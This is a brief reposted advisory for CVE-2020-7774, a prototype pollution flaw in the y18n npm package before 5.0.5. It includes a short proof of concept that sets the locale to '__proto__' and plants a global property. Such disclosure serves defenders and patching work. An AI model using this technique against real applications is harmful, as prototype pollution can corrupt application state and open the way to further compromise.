CVE-2020-7774

CVE-2020-7774

This affects the package y18n before 5.0.5. PoC by po6ix: const y18n = require(‘y18n’)(); y18n.setLocale(‘__proto__’); y18n.updateLocale({polluted: true}); console.log(polluted); // true

Source: CVE-2020-7774

답글 남기기

이메일 주소는 공개되지 않습니다. 필수 필드는 *로 표시됩니다